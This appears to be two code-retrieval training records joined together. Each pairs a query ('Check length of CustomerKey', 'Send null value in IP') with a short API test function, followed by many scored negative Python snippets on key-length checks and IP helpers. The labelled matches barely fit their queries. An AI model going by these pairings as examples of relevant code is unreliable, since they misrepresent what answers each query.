[ "0.751583", "0.6865551", "0.6805979", "0.6515183", "0.6490027", "0.64431405", "0.6335833", "0.6305529", "0.6286746", "0.6239916", "0.62253493", "0.61821294", "0.6133636", "0.60966367", "0.605465", "0.6052676", "0.60452414", "0.6023541", "0.6023541", "0.60178965", "0.6007776", "0.5984716", "0.5942965", "0.5936372", "0.58901393", "0.58810353", "0.5879203", "0.5860013", "0.58567125", "0.58461845", "0.5830722", "0.5820042", "0.58124185", "0.57919", "0.5781015", "0.577948", "0.5764639", "0.5755718", "0.5745164", "0.57269174", "0.57257646", "0.57113534", "0.5696706", "0.56907123", "0.5689192", "0.56677204", "0.5650581", "0.56455547", "0.5644738", "0.5642061", "0.5637854", "0.5635847", "0.56290877", "0.5613081", "0.5602815", "0.5600555", "0.55950963", "0.5579142", "0.55695677", "0.5565093", "0.55617213", "0.55581665", "0.5543686", "0.55421937", "0.5536314", "0.5532761", "0.5523976", "0.5512223", "0.55104387", "0.5497835", "0.54976976", "0.54976976", "0.5494962", "0.5492522", "0.5489212", "0.5486875", "0.5486815", "0.54837", "0.547471", "0.546466", "0.5461485", "0.54595494", "0.54507065", "0.54506177", "0.54469705", "0.54453367", "0.54317325", "0.5431137", "0.54283226", "0.5426549", "0.54219586", "0.54191977", "0.54178756", "0.54131234", "0.5412287", "0.54073477", "0.5406114", "0.5402759", "0.5402759", "0.5402691", "0.539592" ]
0.0
-1
Check length of CustomerKey (len= 51)
def test_46(self): assert 'False' == Api.requestBlock('test-46')
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def check_len( string_key ) : \r\n\r\n if len( string_key ) != 4 :\r\n\r\n raise Eggog( \"'%s': EGI wants the key to be exactly four characters!\" % (string_key, ) ) \r\n \r\n else :\r\n \r\n return True", "def test_rfc_nickkey_length(s):\n assert len(util.rfc_nickkey(s)) == len(s)", "def validate_authkey(value):\n if not len(value) == 32:\n raise ValidationError(\n 'Value must be a string containing 32 alphanumeric characters')", "def source_data_key_length_check(source_data_key, algorithm):\n if len(source_data_key.data_key) != algorithm.kdf_input_len:\n raise InvalidDataKeyError(\n \"Invalid Source Data Key length {actual} for algorithm required: {required}\".format(\n actual=len(source_data_key.data_key), required=algorithm.kdf_input_len\n )\n )", "def prepKey(key, length):\r\n keyString = \"\"\r\n while len(keyString) < length:\r\n for char in key:\r\n if len(keyString) < length:\r\n keyString += char\r\n return keyString", "def _is_valid_key(self, key):\r\n\r\n # Check the length\r\n if len(key) > 250:\r\n return False\r\n\r\n # Check that there are no spaces or control characters\r\n for char in key:\r\n if ord(char) < 33 or ord(char) == 127:\r\n return False\r\n\r\n return True", "def test_neg_list_size_with_nonexistent_key(self):\n charSet = 'abcdefghijklmnopqrstuvwxyz1234567890'\n minLength = 5\n maxLength = 30\n length = random.randint(minLength, maxLength)\n key = ('test', 'demo', ''.join(map(lambda unused:\n random.choice(charSet),\n range(length))) + \".com\")\n try:\n self.as_connection.list_size(key, \"contact_no\")\n except e.RecordNotFound as exception:\n assert exception.code == 2", "def isValidKey(key):\n return True", "def proper_key(key, klen):\n ckey = \"\"\n if len(key) < klen:\n lmulti = math.floor(klen/len(key))\n lmod = klen % len(key)\n ckey = key * int(lmulti) + key[:lmod]\n elif len(key) > klen:\n ckey = key[:klen]\n else:\n ckey = key\n return ckey", "def test_long():\n key = 'A' * 242\n hashed_key = '%s[3705915182]' % ('A' * 229)\n full_key = 'prefix:1:%s' % hashed_key\n assert full_key == make_key(key, 'prefix', 1)", "def is_valid(key):\n return key[0:2] == \"MR\" and key[2:].isdigit() and len(key) in [9, 10]", "def test_maxlength(self):\n val = DwcaValidator(yaml.load(self.yaml_length, Loader=yaml.FullLoader),\n error_handler=WhipErrorHandler)\n document = {'license_plate': 'AF8934'}\n self.assertTrue(val.validate(document))\n\n document = {'license_plate': '123456'}\n self.assertTrue(val.validate(document))\n\n document = {'license_plate': 'AF893'}\n self.assertTrue(val.validate(document))\n\n document = {'license_plate': 'AF8-934'}\n self.assertFalse(val.validate(document))\n\n document = {'license_plate': 'AF 934'}\n self.assertFalse(val.validate(document))", "def valid_serial_key(serial_key):\n parts = serial_key.split('-')\n if len(parts) != 5:\n return False\n\n for part in parts:\n if not re.match('[A-Z0-9]{5}$', part):\n return False\n\n return True", "def test_minlength(self):\n val = DwcaValidator(yaml.load(self.yaml_length, Loader=yaml.FullLoader),\n error_handler=WhipErrorHandler)\n document = {'postal_code': '9050'}\n self.assertTrue(val.validate(document))\n\n document = {'postal_code': 'B-9050'}\n self.assertTrue(val.validate(document))\n\n document = {'postal_code': '905'}\n self.assertFalse(val.validate(document))", "def len12(self, len): # -> None:\n ...", "def min_length(verifield, required):\n if verifield is None: return True\n return len(verifield) >= required", "def check_type( string_key ) : \r\n\r\n if type( string_key ) != type( '' ) : \r\n\r\n # raise self.__class__( \"'%s': EGI wants the key to be four _characters_ (not %s) !\" % (type(string_key), ) ) \r\n raise Eggog( \"'%s': EGI wants the key to be four _characters_ (not %s) !\" % (type(string_key), ) ) \r\n \r\n else :\r\n \r\n return True", "def test_generate_key(self): \n k = Key().generate()\n self.assertRegex(k, \"[a-zA-Z0-9+\\/]+={0,2}\")", "def max_length(verifield, required):\n if verifield is None: return True\n return len(verifield) <= required", "def generate_key(length):\n return ''.join(random.choice(string.ascii_letters + string.digits) for _ in range(length))", "def _is_size_key (self, key):\n return key == '$size' or key == 'size'", "def test_get_shortuuid_specific_length(self):\n id = get_shortuuid(length=10)\n self.assertTrue(len(id) == 10)", "def key_size(self) -> int:\n pass", "def key_size(self) -> int:\n pass", "def test_length(self):\n for length in range(2, 30):\n self.assertEqual(len(generate_password(length)), length)", "def testKeyInfoTooShort(self):\n key = 5\n self.assertRaises(ValueError, dataToToken, key, data='x', keyInfo='xx')", "def _validate_and_split_key(self, key):\n if self._len_keys == 1:\n return self._validate_and_split_len_one(key)\n else:\n return self._validate_and_split_len(key)", "def testKeyInfoTooLong(self):\n key = 5\n self.assertRaises(ValueError, dataToToken, key, data='hey',\n keyInfo='xxxxx')", "def test_minlength():\n assert has_min_length(None, 8) is None\n assert has_min_length('abcd1234', 8) is None\n assert has_min_length('a', 8)", "def test_short():\n key = 'A' * 241\n full_key = 'prefix:1:%s' % key\n assert full_key == make_key(key, 'prefix', 1)", "def check_len(password_length, alphabet_length, numb_length, symb_length):\r\n return (symb_length + alphabet_length + numb_length) == password_length", "def LengthTest(arr):\n\tif len(arr) == 8:\n\t\treturn True;\n\telif len(arr) == 7:\n\t\treturn IsMissingField('cid', arr)\n\telse:\n\t\treturn False", "def generate_key( length=10, char_set='all' ):\n\n if char_set == 'digits':\n char_list = string.digits\n elif char_set == 'letters':\n char_list = string.lowercase[:26] + string.uppercase[:26]\n else:\n char_list = good_chars\n\n char_list_limit = len( char_list ) - 1\n\n key = ''\n i = 0\n while i < length:\n key = string.join( [ key , char_list[ random.randint( 0, char_list_limit ) ] ], '' )\n i = i + 1\n\n return key", "def _check_key(self, key):\n raise NotImplementedError", "def generate_randomkey(length):\n chars = string.letters + string.digits\n return ''.join([choice(chars) for i in range(length)])", "def guess_key_length(self, min_len=1, max_len=9, display=False):\n\n res = {}\n max_ic = 0\n probable_key_length = 0\n # We try different key lengths\n for i in range(min_len, max_len+1):\n\n if self._len < i*2:\n continue\n ics = []\n for j in range(i):\n var = []\n for k in range(self._len//i):\n var.append(self._s[k*i + j])\n text = VigenereLikeCipher(''.join(var))\n ics.append(text.get_ic())\n total_ic = round(sum(ics)/len(ics),4)\n if total_ic > max_ic:\n max_ic = total_ic\n probable_key_length = i\n res[i] = total_ic\n if display:\n print \"\\n[+] Visual key length IC correspondance\"\n for k,v in res.items():\n v = int(round(v*1000,0))\n print str(k) + (int(math.floor(math.log10(len(res))))+1-len(str(k)))*\" \",\n print ''.join(['|' for i in range(v//2)])\n print \"\"\n return probable_key_length", "def hstrlen(self, key, field):\n return self._command(b'HSTRLEN', key, field)", "def test_valid_key(self):\n f = lws.valid_data_key\n assert f('string', int, r'string') is False\n assert f('string', str, r'test') is False\n assert f(123, int, '123') is False\n assert f(123.00, float, '123') is False\n assert f('123', str, r'[0-9]*') is True", "def check_keys(self):", "def test_length(self):\n form_data = self.form_data('c897B$eH@')\n form = self.form(data=form_data, user=self.u)\n self.assertFalse(form.is_valid())", "def _validate_ordering_customer_50K(self, val):\n return val", "def unique_key(size):\n # Charset to create keys from\n charset = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890'\n l = len(charset)-1\n bad_key = 1\n\n # Get a new seed\n ran.seed()\n\n while(bad_key > 0):\n # Create key\n key = list()\n for i in range(size):\n r = ran.randint(0, l)\n key.append(charset[r])\n key = \"\".join(key)\n\n # Check key\n bad_key = check_key(key)\n\n return(key)", "def kem_encapsulated_key_len(self, public_key):\n result = self._lib_vscf_ecc.vscf_ecc_kem_encapsulated_key_len(self.ctx, public_key.c_impl)\n return result", "def format_length( self, key ) :\r\n\r\n return struct.calcsize( self[key] )", "def generate_api_key(key_length: int = settings.api_app_auth_key_length) -> str:\n return secrets.token_urlsafe(64)[:key_length]", "def _validate_string_min_length(self, value):\n if self.min_length is not None:\n return len(str(value)) >= self.min_length\n else:\n return True", "def test_allowed_chars(self):\n hash_val = self.reverse_hash.get_hash('123')\n self.assertEqual(hash_val['error'], 'allowed chars {}'.format(self.reverse_hash.letters))", "def checkSize(rsakey, messageSize):\n keySize = key.getKeyLength(rsakey)\n if(keySize >= messageSize):\n return True\n if(keySize < messageSize):\n return False", "def check_length(string):\n if 6 < len(string) < 12:\n return True\n\n print(\"Your password is not between 6 and 12 characters\")\n return False", "def len23(self, len): # -> None:\n ...", "def key_length(self):\n if hasattr(self, '_m_key_length'):\n return self._m_key_length if hasattr(self, '_m_key_length') else None\n\n self._m_key_length = self.rsa_n.length_in_bits\n return self._m_key_length if hasattr(self, '_m_key_length') else None", "def _enforce_txt_record_maxlen(key, value):\n # Add 1 for '=' separator between key and value\n if len(key) + len(value) + 1 > 255:\n # 255 - 3 ('...') - 1 ('=') = 251\n return value[: 251 - len(key)] + \"...\"\n return value", "def test_minmaxlength(self):\n val = DwcaValidator(yaml.load(self.yaml_length, Loader=yaml.FullLoader),\n error_handler=WhipErrorHandler)\n document = {'code': 'AA'}\n self.assertTrue(val.validate(document))\n\n document = {'code': 'A'}\n self.assertFalse(val.validate(document))\n\n document = {'code': 'ABC'}\n self.assertFalse(val.validate(document))", "def _is_valid_key(self, key):\n\t\t\n\t\t# If the key is not a string\n\t\tif not isinstance(key, str):\n\t\t\treturn False\n\t\telse:\n\t\t\tkey = str.upper(key)\n\t\t\n\t\t# If the given key does not match the standard notation XY\n\t\tif len(key) != 2:\n\t\t\treturn False\n\t\t\n\t\t# If the key is out of the board\n\t\tif key[0] not in self.columns or key[1] not in self.rows:\n\t\t\treturn False\n\t\t\n\t\t# Otherwise the key is valid\n\t\treturn True", "def size(self, key):\n return self.cli.passwords.size(key)", "def get_max_key(data):\n return max(map(len, data))", "def setup_key_encrypt(self):\r\n\t\tself.max_key = math.floor(len(self.message) / 2)\r\n\t\twhile True:\r\n\t\t\tkey = input(f\"Please enter a key value less than or equal to {self.max_key}. --> \")\r\n\t\t\ttry:\r\n\t\t\t\tself.key = int(key)\r\n\t\t\texcept ValueError:\r\n\t\t\t\tprint(\"Key needs to be a number.\")\r\n\t\t\t\tcontinue\r\n\t\t\tif self.key > self.max_key: \t\t\t\r\n\t\t\t\tprint(f\"{key} is too big of a number.\")\t\r\n\t\t\telif self.key == 0:\r\n\t\t\t\tprint(\"0 cannot be a key\")\t\t\t\r\n\t\t\telse:\t\t\t\r\n\t\t\t\tbreak", "def test_valid_customer(self):\n request = MockRequest()\n\n key_list = list_customer_keys(self._connection, _test_username)\n self.assertEqual(len(key_list), 1)\n key_id, key_value = key_list[0]\n\n authentication_string = compute_authentication_string(\n key_id,\n key_value,\n _test_username,\n _test_method,\n current_timestamp(),\n _test_uri\n )\n request.__dict__[\"authorization\"] = authentication_string.split()\n request.__dict__[\"method\"] = _test_method\n request.__dict__[\"headers\"] = {\n 'x-nimbus-io-timestamp' : str(current_timestamp())\n } \n request.__dict__[\"path_qs\"] = _test_uri\n\n authenticator = SqlAuthenticator()\n authenticated = authenticator.authenticate(\n self._connection, _test_username, request\n )\n self.assertTrue(authenticated)", "def RequireScriptHash(key):\n Require(len(key) == 20)\n return True", "def _validate_beneficiary_customer_59A(self, val):\n return val", "def secure_passphrase(val: str) -> bool:\n if len(val) < 15:\n return False\n if len([v for v in val if v not in string.ascii_letters]) < 5:\n return False\n\n return True", "def is_perCapita(key):", "def number_keys(a_dictionary):\n return(len(a_dictionary))", "def _validate_length(self, value):\n return (self.maximum_length is None) or (len(value) <= self.maximum_length)", "def __len__(self):\n return self.cli.passwords.len()", "def confirm_resdic_chainid_length(params):\n resdic_params = (p for p in params if p.startswith('resdic_'))\n for param in resdic_params:\n chainid = param.split('_')[-1]\n if len(chainid) > 1:\n raise ValueError(\n f\"We found the parameter {param!r} which has \"\n \"more than one character in the chain \"\n \"identifier. Chain IDs should have only one character.\"\n )", "def str_len():\n strlen_dict = {}\n # Length of ion name\n strlen_dict['ion'] = 6\n # Length of data file name for line source\n strlen_dict['Source'] = 30\n # Return\n return strlen_dict", "def __len__(self):\n return len(self._key_order)", "def test_utils_random_string(self, tcex, string_length):\n result = tcex.utils.random_string(string_length=string_length)\n assert (\n len(result) == string_length\n ), f'The length of the string {len(result)} != {string_length}'", "def _validate_length(data, min, max, err): # lint-amnesty, pylint: disable=redefined-builtin\n if len(data) < min or len(data) > max:\n raise errors.AccountDataBadLength(err)", "def test_set_key_too_long(self):\n with RandomKeyTmpFile(128) as fname:\n command_line = self._MENU + [self._KEYNAME, \"--keyfile-path\", fname]\n self.check_error(StratisCliEngineError, command_line, _ERROR)", "def test01_password_length(self):\n self.set_complexity(length=13, numeric=0, upper=0, lower=0, special=0)\n\n invalid = (\n \"A\",\n \"Tr0ub4dor&3\",\n \"!!!!!!!!!!!!\",\n \"Password\",\n \"Password123!\",\n \"admin\",\n )\n self.assertPasswordsInvalid(invalid)\n\n valid = (\n \"correcthorsebatterystaple\",\n \"abcdefghijklmopqrstuvwxyz\",\n \"12345678901234567890\",\n \"!!!!!!!!!!!!!\" \"Password123!___\",\n )\n self.set_passwords(valid)", "def getNumberOfKeys(self) -> int:\n ...", "def make_random_key(length=RANDOM_KEY_LENGTH, chars=RANDOM_KEY_CHARACTERS):\n chars = [random.choice(chars) for _ in range(length)]\n return ''.join(chars)", "def validate_key(self, key: keyType) -> bool:\n if isinstance(key, (dict,bool)):\n raise Exception\n if key is None:\n raise Exception\n # Numerical key object has no len(),\n # so explicitly specify which types are not allowed to use empty value as keys\n if isinstance(key, (str, tuple, set, list)) and (len(key) == 0):\n raise Exception\n return True", "def get_dict_data_len(x_dict: Dict[Any, Collection]):\n return check_all_same_length(*x_dict.values())", "def __len__(self):\n\t\treturn 8", "def __len__(self):\n return len(self.token2id)", "def is_name_length_valid(self) -> bool:\n return 2 < len(self.app_name) <= 35", "def field_length(self,\r\n entrylist=None):\r\n\r\n\r\n if entrylist is None:\r\n entrylist = list(self.default_dict['field'].keys())\r\n maxlength = 0\r\n for i_temp in entrylist:\r\n if len(self.default_dict['field'][i_temp]) > maxlength:\r\n maxlength = len(self.default_dict['field'][i_temp])\r\n return maxlength", "def random_key(size):\n return ''.join(random.choice(string.letters) for _ in range(size))", "def test_encrypt_key(self):\n encrypted = encrypt('message', key=b'0' * 32)\n\n assert encrypted\n assert encrypted != 'message'", "def checkLength(ish, length):\n if ish == \"Visa\":\n ok = (13,16)\n elif ish == \"American Express\":\n ok = (15,)\n elif ish == \"MasterCard\":\n ok = (16,)\n elif ish == \"Discover/Novus\":\n ok = (16,)\n else:\n raise TypeError, \"unknown issuer\"\n return length in ok", "def _GetKeyString(self):", "def _GetKeyString(self):", "def test_has_correct_number_of_keys_and_values(self):\n self.has_correct_number_of_keys_and_values(2, 1)", "def test_has_correct_number_of_keys_and_values(self):\n self.has_correct_number_of_keys_and_values(2, 1)", "def generate_key(length, choices=None):\n if choices is None:\n choices = (\n string.ascii_lowercase +\n string.ascii_uppercase +\n string.digits\n )\n\n return ''.join(random.choice(choices) for x in xrange(length))", "def verify_hack_key(self):\r\n\t\tself.percent_english = Dict_Control(self.my_code).check_key()\r\n\t\t#If more than half the words are english, the key will pass. \r\n\t\tif self.percent_english > 50:\r\n\t\t\tself.hack_plausible = True", "def safe_key(key, key_prefix, version):\r\n\r\n # Clean for whitespace and control characters, which\r\n # cause memcache to raise an exception\r\n key = cleaned_string(key)\r\n key_prefix = cleaned_string(key_prefix)\r\n version = cleaned_string(version)\r\n\r\n # Attempt to combine the prefix, version, and key\r\n combined = \":\".join([key_prefix, version, key])\r\n\r\n # If the total length is too long for memcache, hash it\r\n if len(combined) > 250:\r\n combined = fasthash(combined)\r\n\r\n # Return the result\r\n return combined", "def __init__(self, key: bytes):\n\n if len(key) != 32:\n raise ValueError('Key must be 32 bytes long')\n self.key = key", "def password_min_length(self) -> Optional[pulumi.Input[int]]:\n return pulumi.get(self, \"password_min_length\")", "def password_min_length(self) -> Optional[pulumi.Input[int]]:\n return pulumi.get(self, \"password_min_length\")", "def validate_kf_id(kf_id, prefix='TA'):\n if len(kf_id) != 11 or kf_id[:3] != prefix+'_':\n abort(400, f\"'{kf_id}' is not a valid kf_id\")", "def test_wrong_total_number_of_keys(self):\n xml = self._make_request()\n request = request_from_xml(xml)\n policy = replace(self.policy, num_different_keys_in_all_bundles=2)\n with self.assertRaises(KSR_POLICY_KEYS_Violation) as exc:\n validate_request(request, policy)\n self.assertEqual(\n \"Unacceptable number of key sets in request test, (1 keys instead of 2)\",\n str(exc.exception),\n )", "def getAuthKey(self):\r\n auth_key = 'Que despierte la Red'\r\n assert len(auth_key) == self.AUTH_KEY_LEN\r\n return auth_key", "def test_kf_id():\n\n for _ in range(1000):\n prefix = ''.join(random.sample(string.ascii_uppercase, 2))\n kf_id = kf_id_generator(prefix)()\n assert kf_id[:2] == prefix\n assert len(kf_id) == 11\n assert kf_id[2] == '_'\n\n assert 'I' not in kf_id[2:]\n assert 'L' not in kf_id[2:]\n assert 'O' not in kf_id[2:]\n assert 'U' not in kf_id[2:]\n\n assert re.search(r'^'+prefix+r'_[A-HJ-KM-NP-TV-Z0-9]{8}', kf_id)", "def get_random_key(self, size=16):\n key = ''.join([random.choice(Characters.get_characters()) for i in range(size)])\n return self.__strengthen_key(key)", "def check_empty_key(self, key):\n if key is None or key == \"\" or key == self.empty_api_key:\n print(\"ERROR, A KEY IS EMPTY - CHECK YOUR FILE\")\n return False\n return True", "def nkeytexts(self):\n return len(self.__keytexts)", "def nkeytexts(self):\n return len(self.__keytexts)" ]
[ "0.7524419", "0.68488765", "0.6717122", "0.65168095", "0.6435481", "0.6403643", "0.63951415", "0.63328946", "0.62844515", "0.6251781", "0.6235365", "0.61816084", "0.6115362", "0.6111987", "0.6067936", "0.6057888", "0.60268646", "0.60186607", "0.60172915", "0.59633636", "0.59628296", "0.5928509", "0.59246284", "0.59246284", "0.59189224", "0.5902894", "0.5885312", "0.58551323", "0.5849002", "0.5838142", "0.5798352", "0.57918406", "0.5728898", "0.5726331", "0.5723914", "0.57221663", "0.57172686", "0.57024205", "0.5689582", "0.5682899", "0.56793076", "0.56686944", "0.56650174", "0.5663552", "0.5661435", "0.56282675", "0.5627651", "0.5613829", "0.5611821", "0.5603955", "0.559567", "0.55916226", "0.55882776", "0.5554245", "0.5542103", "0.55401826", "0.5534854", "0.5532206", "0.55265456", "0.55232435", "0.55214024", "0.5511582", "0.55054086", "0.5503353", "0.5498173", "0.5494202", "0.54831994", "0.547872", "0.5478519", "0.5477827", "0.5477197", "0.54752624", "0.54733056", "0.54688126", "0.54679406", "0.54611456", "0.5451337", "0.54478604", "0.54469514", "0.54399425", "0.5436256", "0.54205364", "0.54170454", "0.5416918", "0.5416918", "0.5413427", "0.5413427", "0.54133856", "0.5411284", "0.54037994", "0.54029834", "0.54018235", "0.54018235", "0.5399204", "0.53987443", "0.53818613", "0.5379787", "0.5379552", "0.5378111", "0.5376278", "0.5376278" ]
0.0
-1
Send null value in IP
def test_47(self): assert 'False' == Api.requestBlock('test-47', CustomFields=True)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def test_noop(self):\n self.assertFalse(helpers.getBcastAddrforIPv4())\n self.assertIsNone(helpers.no_op())", "def ip_white(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"ip_white\")", "def ip_white(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"ip_white\")", "def send_nop(self):\n if not self.connected(): return\n try:\n self.wlock.acquire()\n nop = telnetlib.IAC + telnetlib.NOP\n if self.verbose:\n self.tn.msg(\"send %r\", nop)\n self.tn.sock.sendall(nop) # write() doubles IAC, so use sendall\n finally:\n self.wlock.release()", "def __init__(self) -> None:\n self.ip_address: str | None = None", "def test_init_no_ip(self):\n client = ClientInfo(\"cc:cc:cc:cc:cc:cc\", ip=None, ap_info=self.ap)\n self.assertEqual(client.ip, None)\n self.assertEqual(client.ip_bytes, None)", "def _load_ip_addr():\n IPAddr = session.get('IPAddr')\n\n if IPAddr is None:\n g.IPAddr = None\n else:\n g.IPAddr = IPAddr", "def ip(self) -> Optional[str]:\n return pulumi.get(self, \"ip\")", "def getServerIP():\n # Create a UDP socket at client side\n UDPClientSocket = socket.socket(family=socket.AF_INET, type=socket.SOCK_DGRAM)\n UDPClientSocket.settimeout(0.15)\n\n \n for i in ['127.0.0.1']+list(range(0,256)):#iterating through all network IPs....127.0.0.1 is localhost\n try:\n IP=\"192.168.2.\"+str(i) if i!='127.0.0.1' else i #\n print(IP,end=\" \") \n UDPClientSocket.sendto(bytesToSend, (IP, 20001))#send message\n msg,IP = UDPClientSocket.recvfrom(bufferSize)#get response\n if (msg==str.encode(ACK_MESSAGE)):\n print()#printed IP wont clear without this command\n cls()#if IP found it clears all the console \n return IP[0]\n except Exception as e:\n print(e)\n \n return 0", "def ip_address(self, obj):\n if obj.node.ip_address:\n return obj.node.ip_address\n return None", "def local_ip(self) -> Optional[str]:\n if not self._send_parse_reply(b\"AT+IPADDR\", b\"+IPADDR:\"):\n return None\n return self._buf", "def JP_V0_addr(self, addr):\n\t\tself.IP = addr + self.V[0]", "def get_ip(self):", "def send_noop():\n send_command(0xE3)", "def ip_white(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"ip_white\")", "async def test_gateway_empty_string(\n ip4config_service: IP4ConfigService, dbus_session_bus: MessageBus\n):\n ip4 = IpConfiguration(\"/org/freedesktop/NetworkManager/IP4Config/1\", ip4=True)\n await ip4.connect(dbus_session_bus)\n\n ip4config_service.emit_properties_changed({\"Gateway\": \"\"})\n await ip4config_service.ping()\n assert ip4.gateway is None", "def test_empty(self):\n self.assertFalse(isIPv6Address(\"\"))", "def none_to_empty(data):\n return data if data is not None else ''", "def no_transport(data, affected_points):\n return", "def allow_ip_sans(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"allow_ip_sans\")", "def allow_ip_sans(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"allow_ip_sans\")", "def JP_addr(self, addr):\n\t\tself.IP = addr", "def __init__(\n self, name: str = \"\", protocol: int | None = None, **kwargs: Any\n ) -> None:\n\n super().__init__(name=name, **kwargs)\n\n if protocol not in [None, 4, 6]:\n raise ValueError(\"IpAddress protocol needs to be either 4, 6 or None\")\n self.protocol = protocol", "def test_address_empty(self):\n tester = app.test_client(self)\n response = tester.post(\"/result\",\n data = dict(location =\"\"),\n follow_redirects = True)\n self.assertIn(b\"Null input\", response.data)", "def ip_not(self, ip_not):\n\n self._ip_not = ip_not", "def set_deafult_gw(self, args):\n\n gw_ip = ip_address(args.ip)\n gw_info = UplinkGatewayInfo()\n gw_info.update_ip(str(gw_ip))\n print(\"set Default gw IP to %s\" % gw_info.get_gw_ip())", "def convert_nil(self, v, t):\n assert len(v) == 0\n return None", "def setIpaddr(self):\n\t\tself.ipaddr = self.settings.getKeyValue('ipaddr')\n\t\tself.socket.send('setenv ipaddr ' + self.ipaddr+'\\r', 1)\t\t\n\t\treturn None", "def sendPing(self, payload=None):", "def spoof_packet(packet):", "def silent_none(value):\n if value is None:\n return ''\n return value", "def sticky_option(ctx, param, value):\n if value:\n return 'SOURCE_IP'\n return None", "def nullValueToNan(self) -> None:\n self.cpp.nullValueToNan()", "def send_error(self, conn, msg):\n #print(\"THIS IS CONNNNNNNNNNNNNNNNNNNN\", conn.getsockname(), conn.getpeername()) \n usIP = conn.getpeername()[:-1] + \"1\" \n #print(usIP) \n no_route = {\"src\": usIP, \"dst\": msg[\"src\"], \"type\": \"no route\", \"msg\": {}}\n conn.send(json.dumps(no_route).encode(\"ascii\"))\n return", "def ip_address(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"ip_address\")", "def ip_address(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"ip_address\")", "def ip_address(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"ip_address\")", "def ip_address(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"ip_address\")", "def ip(self, mess, args):\n return '%s\\n' % urlgrabber.urlread('http://whatismyip.org')", "def __str__(self):\n return \"{}\".format(visiteur.ip)", "def server_zero():\n return intrinsics.federated_value(0, placements.SERVER)", "def signup_ip(obj):\n try:\n return obj.consumer.history.all()[0].ip\n except (AttributeError, IndexError):\n return \"N/A\"", "def write_nul_bytes(self, n):\n self.write(b'\\x00' * n)", "def __init__(\n self, name: str = \"\", protocol: int | None = None, **kwargs: Any\n ) -> None:\n\n super().__init__(name=name, **kwargs)\n if not ipaddress:\n raise SoftDependencyError(\"ipaddress\")\n if protocol not in [None, 4, 6]:\n raise ValueError(\"IpAddress protocol needs to be either 4, 6 or None\")\n self.protocol = protocol", "def fillna_method(request: Any) -> Any:\n return request.param", "def fillna_method(request: Any) -> Any:\n return request.param", "def gateway(self):\n return ''", "def noneType(value):\r\n return ''", "def test_format_phone_none(self):\n number1 = None\n self.assertEqual(format_phone(number1), None)", "def encode_null_term(self, input):\n return input.encode() + b'\\x00'", "def allowNoneIngressLabel(self):\n return self.isAllowedIngressLabel(None)", "def allowNoneIngressLabel(self):\n return self.isAllowedIngressLabel(None)", "def test_mask_secret_null():\n assert utils.mask_secrets(\"\", None) == \"\"", "def validateIp(sValue, aoNilValues = tuple([None, '']), fAllowNull = True):\n if sValue in aoNilValues:\n return (sValue, None if fAllowNull else 'Mandatory.');\n\n if sValue == '::1':\n return (sValue, None);\n\n try:\n socket.inet_pton(socket.AF_INET, sValue); # pylint: disable=E1101\n except:\n try:\n socket.inet_pton(socket.AF_INET6, sValue); # pylint: disable=E1101\n except:\n return (sValue, 'Not a valid IP address.');\n\n return (sValue, None);", "def address_str(self) -> str | None:\n pass", "def __init__(__self__, *,\n ip: Optional[pulumi.Input['IPAccessControlArgs']] = None):\n if ip is not None:\n pulumi.set(__self__, \"ip\", ip)", "def __init__(__self__, *,\n ip: Optional[pulumi.Input['IPAccessControlArgs']] = None):\n if ip is not None:\n pulumi.set(__self__, \"ip\", ip)", "def allow_ip_sans(self) -> pulumi.Output[Optional[bool]]:\n return pulumi.get(self, \"allow_ip_sans\")", "def to_net(self, value):\n return value", "def test_serialize_none(self):\n self.assertEqual(serialize(None), 'null')", "def get_local_host_ip(self) -> str:", "def _send(self, what, value, address, **kwargs):\n\n print('_send: please override me.')", "def test_replace_host_subnet(self):\n pass", "def get_ip(request):\n ip1 = request.META.get('REMOTE_ADDR', '')\n ip2 = request.META.get('HTTP_X_FORWARDED_FOR', '').split(\",\")[0].strip()\n ip = ip1 or ip2 or '0.0.0.0'\n return ip", "def noop():", "def unknown_address(ip_address: str) -> dict:\n address = UNKNOWN_COUNTRY.copy()\n address.update({\"remote_addr\": ip_address})\n return address", "def get_ip_dotted(self):\r\n return socket.inet_ntoa(struct.pack('>I', self.ip))", "def get_ip_string():\n return netifaces.ifaddresses('br0')[netifaces.AF_INET][0]['addr']", "def host_ip(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"host_ip\")", "def send_error(self, conn, msg):\n # dst ip becomes src ip to return the message\n\n # src ip becomes this ip\n\n # type becomes \"no route\"\n\n # msg is empty\n\n # send from port incoming...current dst ip?\n\n # TODO\n\n return", "def ip_address(self) -> str:\n return self._device.ip if self.is_connected else None", "def get_ip_address(self): # type: () -> t.Optional[str]\n if self.networks:\n network_name = get_docker_preferred_network_name(self.args)\n\n if not network_name:\n # Sort networks and use the first available.\n # This assumes all containers will have access to the same networks.\n network_name = sorted(self.networks.keys()).pop(0)\n\n ipaddress = self.networks[network_name]['IPAddress']\n else:\n ipaddress = self.network_settings['IPAddress']\n\n if not ipaddress:\n return None\n\n return ipaddress", "def encode_none_node(self):\n return self.zero_buffer, self.zero_buffer", "def forget_unicast_address(self):\n self.send_packet('\\xb3')", "def ip_info():\n return str(getIP())", "def sendingString(self):\n return ''", "def fingertip_no_remote(self) -> bool:\n hcell = self._get_hcell2()\n return hcell.get(\"fingertip_no_remote\", False)", "def getIp(self):\n raise NotImplementedError", "def test_default_default_body_sent_with_request(self):\n req = self.httpbin.get_my_ip(dry_run=True)\n def_body = self.httpbin.client[\"default_data\"]\n self.assertIn(urlencode(def_body), req.prepared_request.body)", "def true_sendto(conn, data, address, special=False):\n if special:\n data = pickle.dumps(data)\n else:\n data = data.encode()\n conn.sendto(key.encrypt(data), (address[0], address[1])) # (ip_dst, dport)", "def get_node_ip(\n self,\n name,\n ):\n pass", "def ip(self, ip: str):\n\n self._ip = ip", 